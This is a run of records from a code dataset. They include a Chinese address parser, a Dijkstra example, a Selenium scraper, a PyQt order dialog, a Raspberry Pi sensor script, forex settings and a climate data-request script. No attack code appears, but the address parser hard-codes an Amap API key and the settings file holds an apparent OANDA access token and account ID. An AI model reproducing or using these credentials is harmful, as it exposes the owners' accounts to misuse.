'壮族自治区'\n if state[1] == \"疆\":\n state = state + '维吾尔自治区'\n if state[2] == \"古\":\n state = state + '自治区'\n province = state\n elif Isprovince == 1:\n province = \"\"\n address2 = address\n else:\n province = state+\"省\"\n \n\n\n#分化市级\n for city in city_list:\n if (re.search(city, address2) != None):\n break\n if re.search(city, address2) == None:\n c_city = \"\"\n address3 = address2\n else:\n c_city = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:市|地区|自治州|盟))', address2)\n if(c_city == None):\n length = len(city)\n loc = address2.find(city)\n address3 = address2[loc + length:]\n if city == \"喀什\" or city == \"和田\" or city == \"大兴安岭\" or city == \"阿勒泰\" or city == \"阿克苏\" or city == \"阿里\" or city == \"塔城\":\n c_city = city + \"地区\"\n elif city == \"锡林郭勒\" or city == \"阿拉善\" or city == \"兴安\":\n c_city = city + \"盟\"\n else:\n c_city = city + \"市\"\n else:\n c_city = c_city.group()\n c_city = re.search( city , c_city)\n if (c_city != None):\n c_city = c_city.group()\n length = len(c_city)\n loc = address2.find(c_city)\n address3 = address2[loc + length:]\n if(not(c_city[-1] == \"市\" or c_city[-1] == \"盟\" or ( c_city[-1] == \"州\" and c_city[-2] == \"治\") or ( c_city[-1] == \"区\" and c_city[-2] == \"地\") )):\n if c_city == \"喀什\" or c_city == \"和田\" or c_city == \"大兴安岭\" or c_city == \"阿勒泰\" or c_city == \"阿克苏\" or c_city == \"阿里\" or city == \"塔城\":\n c_city = c_city + \"地区\"\n elif city == \"锡林郭勒\" or c_city == \"阿拉善\" or c_city == \"兴安\":\n c_city = c_city + \"盟\"\n else:\n c_city = c_city + \"市\"\n else:\n length = len(city)\n loc = address2.find(city)\n address3 = address2[:loc] + address2[loc + length:]\n\n#分化区级\n r_region = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县|海域|岛|旗))', address3)\n if (r_region != None):\n length = len(r_region.group())\n loc = address3.find(r_region.group())\n address4 = address3[loc + length:]\n r_region = r_region.group()\n else:\n r_region = \"\"\n address4 = address3\n\n\n#分化镇级\n country = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:街道|镇|乡|园))', address4)\n if (country != None):\n length = len(country.group())\n loc = address4.find(country.group())\n address5 = address4[loc + length:]\n country = country.group()\n else:\n country = \"\"\n address5 = address4\n addressfirst = address5\n \n#分化街级\n street = re.search('([\\u4e00-\\u9fa5]{2,7}?(?:路|街|巷|道|胡同))', address5)\n if (street != None):\n length = len(street.group())\n loc = address5.find(street.group())\n address6 = address5[loc + length:]\n street = street.group()\n else:\n street = \"\"\n address6 = address5\n\n \n#分化号码\n number = re.search('(\\d{1,7}?(?:号))', address6)\n if (number != None):\n length = len(number.group())\n loc = address6.find(number.group())\n address7 = address6[loc + length:]\n number = number.group()\n else:\n number = \"\"\n address7 = address6\n\n#输出结果\n import json\n if (flag.group() == '1'):\n result = {\"姓名\": name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,addressfirst]}\n elif (flag.group() == '2'): \n result = {\"姓名\": name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,street,number,address7]}\n else:\n result = {\"姓名\": name.group(), \"手机\": phone.group(), \"地址\": [province,c_city,r_region,country,street,number,address7]}\n autoCorrAll(result,line)\n print(json.dumps(result, ensure_ascii=False),)\n\n#补全信息,第三难度\ndef autoCorrAll(result,line):\n line = re.sub('#', '', line)\n parameters = { 'address' : line, 'key' : '3487c6b6caf2d1119ce727e60803a716' }\n base = 'https://restapi.amap.com/v3/geocode/geo'\n data = requests.get(base,parameters)\n result_json = data.json()\n j_w = result_json[\"geocodes\"][0][\"location\"]\n data = requests.get(\n \"http://restapi.amap.com/v3/geocode/regeo?output=JSON&location=\"+j_w+\"&key=3487c6b6caf2d1119ce727e60803a716&radius=0&extensions=base\")\n result_json = data.json()\n info = result_json[\"regeocode\"][\"addressComponent\"]\n province = info[\"province\"]\n city = info[\"city\"]\n region = info[\"district\"]\n country = info[\"township\"]\n street = info[\"streetNumber\"][\"street\"]\n number = info[\"streetNumber\"][\"number\"]\n detail = []\n detail.append(province)\n detail.append(city)\n detail.append(region)\n detail.append(country)\n detail.append(street)\n detail.append(number)\n for i in range(4):\n if result[\"地址\"][i] == \"\" and detail[i]!=[]:\n result[\"地址\"][i] = detail[i]\n return result\n\n\nimport re\nimport requests\nwhile 1:\n line=input()\n if line=='END':\n break\n flag = re.search(r'^\\d',line)\n line = re.sub('.!', '', line)\n line = line.strip()\n name = getname(line)\n phone = getphone(line)\n address = getaddress(line, name, phone)\n addr(address, name, phone)\n","sub_path":"031702527.py","file_name":"031702527.py","file_ext":"py","file_size_in_byte":17760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256498760","text":"def find_lowest_cost_node(costs, processed):\n lowest_cost = float(\"inf\")\n lowest_cost_node = None\n for node in costs:\n cost = costs[node]\n if cost < lowest_cost and node not in processed:\n lowest_cost = cost\n lowest_cost_node = node\n return lowest_cost_node\n\n\ndef dijkstra(graph, costs, parents):\n processed = []\n node = find_lowest_cost_node(costs, processed)\n while node is not None:\n cost = costs[node]\n neighbors = graph[node]\n for n in neighbors:\n new_cost = cost + neighbors[n]\n if costs[n] > new_cost:\n costs[n] = new_cost\n parents[n] = node\n processed.append(node)\n node = find_lowest_cost_node(costs, processed)\n\n\n\n# the graph\ngraph = {} # {}\ngraph[\"start\"] = {} # { \"start\": {} } \ngraph[\"start\"][\"a\"] = 6 # { \"start\": { \"a\": 6 } } \ngraph[\"start\"][\"b\"] = 2 # { \"start\": { \"a\": 6, \"b\": 2 } } \n\ngraph[\"a\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": {} } \ngraph[\"a\"][\"fin\"] = 1 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 } } \n\ngraph[\"b\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": {} } \ngraph[\"b\"][\"a\"] = 3 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3 } } \ngraph[\"b\"][\"fin\"] = 5 # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3, \"fin\": 5 } } \n\ngraph[\"fin\"] = {} # { \"start\": { \"a\": 6, \"b\": 2 }, \"a\": { \"fin\": 1 }, \"b\": { \"a\": 3, \"fin\": 5 }, \"fin\": {} } \n\n# the costs table\ninfinity = float(\"inf\") # int(\"inf\") is NOT valid!\ncosts = {} # {}\ncosts[\"a\"] = 6 # { \"a\": 6 }\ncosts[\"b\"] = 2 # { \"a\": 6, \"b\": 2 }\ncosts[\"fin\"] = infinity # { \"a\": 6, \"b\": 2, \"fin\": infinity }\n\n# the parents table\nparents = {} # {}\nparents[\"a\"] = \"start\" # { \"a\": \"start\" }\nparents[\"b\"] = \"start\" # { \"a\": \"start\", \"b\": \"start\" }\nparents[\"fin\"] = None # { \"a\": \"start\", \"b\": \"start\", \"fin\": None }\n\ndijkstra(graph, costs, parents)\nprint(costs)\nprint(parents)\n","sub_path":"grokking/Ch07/dijkstra_algorithm.py","file_name":"dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"652616581","text":"import sys\nsys.stdin = open(\"C급/input.txt\")\n\ndef DFS(n, sol, move):\n global head\n # print(n, sol, move)\n if sol > head:\n return \n if n==N:\n res=sol\n if move+oil[N] > dis:\n res+=oil_time[N-1]\n if res < head:\n head=res\n # print(res)\n return\n if move+oil[n] <= dis:\n DFS(n+1, sol, move+oil[n]) # 충전 안하고 가는 경우\n DFS(n+1, sol+oil_time[n], 0) # 충전하고 가는 경우\n else:\n DFS(n, sol+oil_time[n-1], 0)\n\ndis = int(input())\nN=int(input())\noil = list(map(int,input().split()))\noil_time = list(map(int,input().split()))\n\nhead=9999\nDFS(0, 0, 0)\nprint(head)\n\n\n# 42","sub_path":"codeXpert/AD대비/C급/자동차경주대회.py","file_name":"자동차경주대회.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563032521","text":"from selenium import webdriver\n\n#chromdriver path\ndriver = webdriver.Chrome(r'C:\\Users\\HP\\Desktop\\chromedriver.exe')\n\n#placing website url\ndriver.get('https://www.weather-forecast.com/countries/Nepal')\n\n# xpath of place and its temperature\nplaces = driver.find_elements_by_xpath('//span[@class=\"b-list-table_item-name\"]')\ntemp = driver.find_elements_by_xpath('//span[@class=\"temp\"]')\nnumber1 = len(places)\nnumber2 = len(temp)\n\n#opening weather.txt file\nwith open(\"weather.txt\",\"w\") as f:\n for i in range(number1):\n f.write(places[i].text + \"temperature is\" + temp[i].text + \"\\n\")\n\ndriver.close()\n","sub_path":"Weatherdatacrawl.py","file_name":"Weatherdatacrawl.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401058641","text":"import sys\nimport sqlite3\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom table_display import *\nfrom cascade_style_sheet import *\n\nclass AddItemToOrder(QDialog):\n orderitemAdded = pyqtSignal()\n \"\"\"this class creates a widget to add an item to order\"\"\"\n\n def __init__(self,bookingDetails):\n super().__init__()\n self.setWindowTitle(\"Add Item To Order\")\n self.setMinimumSize(600,600)\n self.bookingDetails = bookingDetails\n self.setStyleSheet(css)\n \n self.main_layout = QVBoxLayout()\n self.add_item_layout = QGridLayout()\n self.add_complete_layout = QHBoxLayout()\n \n self.add_complete = QPushButton(\"Add Item\")\n self.itemID_label = QLabel(\"Item ID : \")\n self.itemQuantity_label = QLabel(\"Item Quantity : \")\n\n #line edit\n regexp = QRegExp(\"^\\\\d\\\\d\\\\d?$\")\n validator = QRegExpValidator(regexp)\n self.input_itemID = QLineEdit()\n self.input_itemID.setValidator(validator)\n self.input_itemID.setMaximumSize(133,30)\n self.input_itemID.setAlignment(Qt.AlignLeft)\n self.input_itemQuantity = QLineEdit()\n self.input_itemQuantity.setValidator(validator)\n self.input_itemQuantity.setMaximumSize(133,30)\n\n self.item_table = DisplayTable()\n self.item_table.show_table(\"Items\")\n \n\n self.add_item_layout.addWidget(self.itemID_label,0,0)\n self.add_item_layout.addWidget(self.itemQuantity_label,1,0)\n self.add_item_layout.addWidget(self.input_itemID,0,1)\n self.add_item_layout.addWidget(self.input_itemQuantity,1,1)\n self.add_complete_layout.addWidget(self.add_complete)\n \n self.main_layout.addWidget(self.item_table)\n self.main_layout.addLayout(self.add_item_layout)\n self.main_layout.addLayout(self.add_complete_layout)\n\n self.setLayout(self.main_layout)\n\n self.add_complete.clicked.connect(self.add_item_to_order)\n\n def add_item_to_order(self,bookingDetails):\n bookingID = self.bookingDetails[0]\n self.ItemID = self.input_itemID.text()\n Quantity = self.input_itemQuantity.text()\n MenuItem = (bookingID,self.ItemID,Quantity)\n addedAlready = self.checkExistingItem()\n print(addedAlready)\n\n try:\n\n if addedAlready == True:\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"select Quantity from Booking_Items where ItemID=? and BookingID = ?\",(self.ItemID, bookingID))\n dbquantity = cursor.fetchone()[0]\n \n newQuantity = dbquantity + int(Quantity)\n updateOrder = (newQuantity,self.ItemID)\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n sql = \"update Booking_Items set Quantity=? where ItemID=?\"\n cursor.execute(\"PRAGMA foreign_keys = ON\")\n cursor.execute(sql,updateOrder)\n db.commit()\n \n self.orderitemAdded.emit()\n\n elif addedAlready == False:\n\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n sql = \"insert into Booking_Items(BookingID,ItemID,Quantity) values (?,?,?)\"\n cursor.execute(\"PRAGMA foreign_keys = ON\")\n cursor.execute(sql,MenuItem)\n db.commit()\n\n self.orderitemAdded.emit()\n except sqlite3.IntegrityError:\n QMessageBox.about(self, \"Error\", \"Please make sure the item exists\")\n\n def checkExistingItem(self):\n addedAlready = False\n itemsOrdered = []\n item = \"\"\n \n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"\"\"SELECT\n Items.ItemName\n FROM Items\n INNER JOIN Booking_Items\n ON Booking_Items.ItemID = Items.ItemID\n WHERE Booking_Items.BookingID = ? \"\"\", (self.bookingDetails[0],))\n items = cursor.fetchall()\n for each in items:\n itemsOrdered.append(each[0])\n\n try:\n with sqlite3.connect(\"restaurant.db\") as db:\n cursor = db.cursor()\n cursor.execute(\"\"\"SELECT\n Items.ItemName\n FROM Items\n INNER JOIN Booking_Items\n ON Booking_Items.ItemID = Items.ItemID\n WHERE Booking_Items.BookingID = ?\n AND Items.ItemID = ?\"\"\", (self.bookingDetails[0], self.ItemID))\n item = cursor.fetchone()[0]\n except TypeError:\n pass\n \n if item in itemsOrdered:\n addedAlready = True\n\n return addedAlready\n\n \n \n\n","sub_path":"Implementation/GUI/add_item_to_order.py","file_name":"add_item_to_order.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"454536035","text":"import RPi.GPIO as GPIO\nimport datetime\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13,GPIO.IN)\nGPIO.setup(29,GPIO.IN)\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(36,GPIO.OUT)\nGPIO.output(36,False)\nGPIO.output(18,False)\n\n#time.sleep(30)\nstartTime= datetime.datetime.now()\n#motion_flag = 0\nmotion_count = 0\n\n\npirA =GPIO.input(13)\npirB =GPIO.input(29)\nif(pirA or pirB) :\n motion_count = motion_count+1\n#motion_flag=motion_flag or pirA or pirB\nendTime= datetime.datetime.now()\ndiff = ((endTime-startTime).total_seconds())/60\nif(diff >=1):\n if(motion_count>=300000):\n # print\"motion\"\n # print motion_count\n# print motion_flag\n GPIO.output(18,True)\n GPIO.output(36,False)\n else:\n # print\"No motion\"\n # print motion_count\n# print motion_flag\n GPIO.output(36,True)\n GPIO.output(18,False)\n motion_count = 0\nendTime2= datetime.datetime.now()\nprint ((endTime2-startTime).total_seconds())\n# motion_flag = 0\n \n \n \n \n \n","sub_path":"otherfiles/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419954362","text":"from random import *\ndef shuffle(lst):\n lst = lst.split()\n tmp = []\n for i in range(0,len(lst)):\n if len(lst) != 0:\n r = randint(0, len(lst)-1)\n tmp.append(lst[r])\n lst.remove(lst[r])\n for i in tmp:\n print(i, end=\" \")\n print(\"\\n\")\nlst = input(\"Enter the number list: \")\nshuffle(lst)\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"207398242","text":"from decimal import Decimal\nimport os\n\n\nENVIRONMENTS = { \n \"streaming\": {\n \"real\": \"stream-fxtrade.oanda.com\",\n \"practice\": \"stream-fxpractice.oanda.com\",\n \"sandbox\": \"stream-sandbox.oanda.com\"\n },\n \"api\": {\n \"real\": \"api-fxtrade.oanda.com\",\n \"practice\": \"api-fxpractice.oanda.com\",\n \"sandbox\": \"api-sandbox.oanda.com\"\n }\n}\n\n# The data directory used to store your backtesting CSV files\nCSV_DATA_DIR = \"D:\\\\Backtesting_data\\\\csv\"\n\n# The directory where the backtest.csv and equity.csv files\n# will be stored after a backtest is carried out\nOUTPUT_RESULTS_DIR = \"D:\\\\Backtesting_data\\\\results\"\n\n# Change DOMAIN to \"real\" if you wish to carry out live trading\nDOMAIN = \"practice\"\nSTREAM_DOMAIN = ENVIRONMENTS[\"streaming\"][DOMAIN]\nAPI_DOMAIN = ENVIRONMENTS[\"api\"][DOMAIN]\n\n# Your OANDA API Access Token (found in your Account Details on their website)\nACCESS_TOKEN = \"6c05d53507c7b52c6157538bf3573d14-b405ec354aa02999dabd4b736ed677af\"\n\n# Your OANDA Account ID (found in your Account Details on their website)\nACCOUNT_ID = \"2105062\"\n\n# Your base currency (e.g. \"GBP\", \"USD\", \"EUR\" etc.)\nBASE_CURRENCY = \"EUR\"\n\n# Your account equity in the base currency (for backtesting)\nEQUITY = Decimal(\"100000.00\")\n\n\"\"\"\nCSV_DATA_DIR = os.environ.get('QSFOREX_CSV_DATA_DIR', None)\nOUTPUT_RESULTS_DIR = os.environ.get('QSFOREX_OUTPUT_RESULTS_DIR', None)\n\nDOMAIN = \"practice\"\nSTREAM_DOMAIN = ENVIRONMENTS[\"streaming\"][DOMAIN]\nAPI_DOMAIN = ENVIRONMENTS[\"api\"][DOMAIN]\nACCESS_TOKEN = os.environ.get('OANDA_API_ACCESS_TOKEN', None)\nACCOUNT_ID = os.environ.get('OANDA_API_ACCOUNT_ID', None)\n\nBASE_CURRENCY = \"GBP\"\nEQUITY = Decimal(\"100000.00\")\n\"\"\"","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121743899","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('message', '0006_message_wasa2il_usage'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='generate_html_mail',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='interactivemessage',\n name='interactive_type',\n field=models.CharField(max_length=60, choices=[(b'registration_received', b'Registration received'), (b'registration_confirmed', b'Registration confirmed'), (b'reject_email_messages', b'Reject mail messages'), (b'email_html_template', b'Email HTML template')]),\n ),\n ]\n","sub_path":"message/migrations/0007_auto_20160802_0034.py","file_name":"0007_auto_20160802_0034.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"16026609","text":"#!/usr/bin/env python\n\"\"\"\nupdate_dreqs_0163.py\n\nThis file creates data requests for additional members of CERFACS'\ncontributions to WP5.\n\"\"\"\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\nimport argparse\nfrom datetime import datetime\nimport logging.config\nimport sys\n\nfrom cf_units import date2num, CALENDAR_GREGORIAN\n\nimport django\ndjango.setup()\n\nfrom pdata_app.models import (DataRequest, VariableRequest, Experiment,\n Institute, ClimateModel, Project, Settings,\n ActivityId)\nfrom pdata_app.utils.dbapi import match_one, get_or_create\n\n\n__version__ = '0.1.0b1'\n\nDEFAULT_LOG_LEVEL = logging.WARNING\nDEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Add additional data requests')\n parser.add_argument('-l', '--log-level', help='set logging level to one of '\n 'debug, info, warn (the default), or error')\n parser.add_argument('--version', action='version',\n version='%(prog)s {}'.format(__version__))\n args = parser.parse_args()\n\n return args\n\n\ndef main(args):\n \"\"\"\n Main entry point\n \"\"\"\n activity_id = 'primWP5'\n\n new_dreqs = [\n 'uas_3hr',\n 'vas_3hr',\n 'pr_6hrPlev',\n 'psl_6hrPlev',\n 'tas_6hrPlev',\n 'uas_6hrPlev',\n 'vas_6hrPlev',\n 'zg1000_6hrPlev',\n 'ta_6hrPlevPt',\n 'ua_6hrPlevPt',\n 'va_6hrPlevPt',\n 'zg27_6hrPlevPt',\n 'zg500_AERday',\n 'ptp_AERmon',\n 'rlutaf_AERmon',\n 'rlutcsaf_AERmon',\n 'rsutaf_AERmon',\n 'rsutcsaf_AERmon',\n 'toz_AERmon',\n 'ztp_AERmon',\n 'clivi_Amon',\n 'clt_Amon',\n 'clwvi_Amon',\n 'evspsbl_Amon',\n 'hfls_Amon',\n 'hfss_Amon',\n 'hur_Amon',\n 'hurs_Amon',\n 'hus_Amon',\n 'huss_Amon',\n 'o3_Amon',\n 'pr_Amon',\n 'prc_Amon',\n 'prsn_Amon',\n 'prw_Amon',\n 'ps_Amon',\n 'psl_Amon',\n 'rlds_Amon',\n 'rldscs_Amon',\n 'rlus_Amon',\n 'rlut_Amon',\n 'rlutcs_Amon',\n 'rsds_Amon',\n 'rsdscs_Amon',\n 'rsdt_Amon',\n 'rsus_Amon',\n 'rsuscs_Amon',\n 'rsut_Amon',\n 'rsutcs_Amon',\n 'sbl_Amon',\n 'sfcWind_Amon',\n 'ta_Amon',\n 'tas_Amon',\n 'tasmax_Amon',\n 'tasmin_Amon',\n 'tauu_Amon',\n 'tauv_Amon',\n 'ts_Amon',\n 'ua_Amon',\n 'uas_Amon',\n 'va_Amon',\n 'vas_Amon',\n 'wap_Amon',\n 'zg_Amon',\n 'ps_CFday',\n 'mlotst_Eday',\n 'rivo_Eday',\n 't20d_Eday',\n 'ta850_Eday',\n 'ts_Eday',\n 'sftgrf_Efx',\n 'cropFracC3_Emon',\n 'cropFracC4_Emon',\n 'evspsblpot_Emon',\n 'grassFracC3_Emon',\n 'grassFracC4_Emon',\n 'intuadse_Emon',\n 'intuaw_Emon',\n 'intvadse_Emon',\n 'intvaw_Emon',\n 'mrtws_Emon',\n 'nwdFracLut_Emon',\n 'orog_Emon',\n 'rls_Emon',\n 'rss_Emon',\n 'sfcWindmax_Emon',\n 't20d_Emon',\n 'thetaot_Emon',\n 'thetaot2000_Emon',\n 'thetaot300_Emon',\n 'thetaot700_Emon',\n 'vegFrac_Emon',\n 'wtd_Emon',\n 'lwsnl_LImon',\n 'sftgif_LImon',\n 'sftgrf_LImon',\n 'snc_LImon',\n 'snd_LImon',\n 'snw_LImon',\n 'baresoilFrac_Lmon',\n 'c3PftFrac_Lmon',\n 'c4PftFrac_Lmon',\n 'cropFrac_Lmon',\n 'gpp_Lmon',\n 'grassFrac_Lmon',\n 'lai_Lmon',\n 'mrfso_Lmon',\n 'mrro_Lmon',\n 'mrros_Lmon',\n 'mrso_Lmon',\n 'mrsos_Lmon',\n 'npp_Lmon',\n 'prveg_Lmon',\n 'ra_Lmon',\n 'rh_Lmon',\n 'treeFrac_Lmon',\n 'tsl_Lmon',\n 'sos_Oday',\n 'tos_Oday',\n 'areacello_Ofx',\n 'basin_Ofx',\n 'deptho_Ofx',\n 'hfgeou_Ofx',\n 'masscello_Ofx',\n 'thkcello_Ofx',\n 'bigthetao_Omon',\n 'bigthetaoga_Omon',\n 'ficeberg_Omon',\n 'friver_Omon',\n 'hfbasin_Omon',\n 'hfcorr_Omon',\n 'hfds_Omon',\n 'hfx_Omon',\n 'hfy_Omon',\n 'htovgyre_Omon',\n 'htovovrt_Omon',\n 'mfo_Omon',\n 'mlotst_Omon',\n 'mlotstmin_Omon',\n 'msftyz_Omon',\n 'rsntds_Omon',\n 'so_Omon',\n 'soga_Omon',\n 'sos_Omon',\n 'sosga_Omon',\n 'tauuo_Omon',\n 'tauvo_Omon',\n 'thetao_Omon',\n 'thkcello_Omon',\n 'tos_Omon',\n 'umo_Omon',\n 'uo_Omon',\n 'vmo_Omon',\n 'vo_Omon',\n 'volo_Omon',\n 'wfo_Omon',\n 'wmo_Omon',\n 'wo_Omon',\n 'zos_Omon',\n 'zossq_Omon',\n 'zostoga_Omon',\n 'rsds_Prim6hr',\n 'rsdsdiff_Prim6hr',\n 'mrso_Primday',\n 'siconc_SIday',\n 'siconca_SIday',\n 'sisnthick_SIday',\n 'sispeed_SIday',\n 'sitemptop_SIday',\n 'sithick_SIday',\n 'sitimefrac_SIday',\n 'siu_SIday',\n 'siv_SIday',\n 'siage_SImon',\n 'siareaacrossline_SImon',\n 'siarean_SImon',\n 'siareas_SImon',\n 'sicompstren_SImon',\n 'siconc_SImon',\n 'siconca_SImon',\n 'sidconcdyn_SImon',\n 'sidconcth_SImon',\n 'sidivvel_SImon',\n 'sidmassdyn_SImon',\n 'sidmassevapsubl_SImon',\n 'sidmassgrowthbot_SImon',\n 'sidmassgrowthwat_SImon',\n 'sidmasslat_SImon',\n 'sidmassmeltbot_SImon',\n 'sidmassmelttop_SImon',\n 'sidmasssi_SImon',\n 'sidmassth_SImon',\n 'sidmasstranx_SImon',\n 'sidmasstrany_SImon',\n 'siextentn_SImon',\n 'siextents_SImon',\n 'sifb_SImon',\n 'siflcondbot_SImon',\n 'siflcondtop_SImon',\n 'siflfwbot_SImon',\n 'siflfwdrain_SImon',\n 'sifllatstop_SImon',\n 'sifllwutop_SImon',\n 'siflsensupbot_SImon',\n 'siflswdbot_SImon',\n 'siflswdtop_SImon',\n 'siflswutop_SImon',\n 'sihc_SImon',\n 'simass_SImon',\n 'simassacrossline_SImon',\n 'sipr_SImon',\n 'sisaltmass_SImon',\n 'sishevel_SImon',\n 'sisnconc_SImon',\n 'sisnhc_SImon',\n 'sisnmass_SImon',\n 'sisnthick_SImon',\n 'sispeed_SImon',\n 'sistrxdtop_SImon',\n 'sistrxubot_SImon',\n 'sistrydtop_SImon',\n 'sistryubot_SImon',\n 'sitempbot_SImon',\n 'sitempsnic_SImon',\n 'sitemptop_SImon',\n 'sithick_SImon',\n 'sitimefrac_SImon',\n 'siu_SImon',\n 'siv_SImon',\n 'sivol_SImon',\n 'sivoln_SImon',\n 'sivols_SImon',\n 'sndmassdyn_SImon',\n 'sndmassmelt_SImon',\n 'sndmasssi_SImon',\n 'sndmasssnf_SImon',\n 'sndmasssubl_SImon',\n 'snmassacrossline_SImon',\n 'clt_day',\n 'hfls_day',\n 'hfss_day',\n 'huss_day',\n 'pr_day',\n 'psl_day',\n 'rlut_day',\n 'rsds_day',\n 'sfcWindmax_day',\n 'snc_day',\n 'ta_day',\n 'tas_day',\n 'tasmax_day',\n 'tasmin_day',\n 'ua_day',\n 'uas_day',\n 'va_day',\n 'vas_day',\n 'zg_day',\n 'areacella_fx',\n 'areacellr_fx',\n 'mrsofc_fx',\n 'orog_fx',\n 'rootd_fx',\n 'sftgif_fx',\n 'sftlf_fx',\n 'zfull_fx',\n ]\n\n institute_details = {\n 'id': 'CNRM-CERFACS',\n 'model_ids': ['CNRM-CM6-1-HR', 'CNRM-CM6-1'],\n 'calendar': CALENDAR_GREGORIAN\n }\n\n experiments = {\n 'primWP5-amv-neg': {'start_date': datetime(1950, 1, 1),\n 'end_date': datetime(1960, 1, 1)},\n 'primWP5-amv-pos': {'start_date': datetime(1950, 1, 1),\n 'end_date': datetime(1960, 1, 1)}\n }\n\n variant_labels = ['r{}i1p1f2'.format(i) for i in range(11, 26)]\n\n # activity_id\n ActivityId.objects.get_or_create(short_name=activity_id,\n full_name=activity_id)\n\n # Experiment cache\n experiment_objs = []\n for expt in experiments:\n expt_obj = match_one(Experiment, short_name=expt)\n if expt_obj:\n experiment_objs.append(expt_obj)\n else:\n msg = 'experiment {} not found in the database.'.format(expt)\n print(msg)\n raise ValueError(msg)\n\n # Institute\n result = match_one(Institute, short_name=institute_details['id'])\n if result:\n institute = result\n else:\n msg = 'institute_id {} not found in the database.'.format(\n institute_details['id']\n )\n print(msg)\n raise ValueError(msg)\n\n # Look up the ClimateModel object for each institute_id and save the\n # results to a dictionary for quick look up later\n model_objs = []\n for clim_model in institute_details['model_ids']:\n result = match_one(ClimateModel, short_name=clim_model)\n if result:\n model_objs.append(result)\n else:\n msg = ('climate_model {} not found in the database.'.\n format(clim_model))\n print(msg)\n raise ValueError(msg)\n\n # The standard reference time\n std_units = Settings.get_solo().standard_time_units\n\n # create the new data requests\n for new_dreq in new_dreqs:\n cmor_name, table_name = new_dreq.split('_')\n if table_name.startswith('Prim'):\n project = match_one(Project, short_name='PRIMAVERA')\n else:\n project = match_one(Project, short_name='CMIP6')\n\n var_req_obj = match_one(VariableRequest, cmor_name=cmor_name,\n table_name=table_name)\n if var_req_obj:\n for expt in experiment_objs:\n for clim_model in model_objs:\n for var_lab in variant_labels:\n _dr = get_or_create(\n DataRequest,\n project=project,\n institute=institute,\n climate_model=clim_model,\n experiment=expt,\n variable_request=var_req_obj,\n request_start_time=date2num(\n experiments[expt.short_name]['start_date'],\n std_units, institute_details['calendar']\n ),\n request_end_time=date2num(\n experiments[expt.short_name]['end_date'],\n std_units, institute_details['calendar']\n ),\n time_units=std_units,\n calendar=institute_details['calendar'],\n rip_code = var_lab\n )\n else:\n msg = ('Unable to find variable request matching '\n 'cmor_name {} and table_name {} in the '\n 'database.'.format(cmor_name, table_name))\n print(msg)\n raise ValueError(msg)\n\n\nif __name__ == \"__main__\":\n cmd_args = parse_args()\n\n # determine the log level\n if cmd_args.log_level:\n try:\n log_level = getattr(logging, cmd_args.log_level.upper())\n except AttributeError:\n logger.setLevel(logging.WARNING)\n logger.error('log-level must be one of: debug, info, warn or error')\n sys.exit(1)\n else:\n log_level = DEFAULT_LOG_LEVEL\n\n # configure the logger\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': DEFAULT_LOG_FORMAT,\n },\n },\n 'handlers': {\n 'default': {\n 'level': log_level,\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default'],\n 'level': log_level,\n 'propagate': True\n }\n }\n })\n\n # run the code\n 